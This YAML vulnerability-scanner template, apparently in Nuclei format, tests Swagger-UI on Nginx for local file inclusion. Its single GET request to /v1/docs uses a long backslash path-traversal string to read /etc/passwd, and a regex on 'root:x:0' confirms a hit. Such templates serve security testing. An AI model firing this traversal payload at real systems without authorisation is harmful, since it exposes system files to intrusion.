id: Swagger-UI -LFI-Injection

info:
  name: Swagger-UI -LFI-Injection
  author: Momika233
  severity: high
  description: Nginx
  reference:
    - https://github.com/momika233
  tags: Swagger,LFI,Injection

requests:
  - method: GET
    path:
      - '{{BaseURL}}/v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd'


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:x:0.*"
        part: body

      - type: status
        status:
          - 200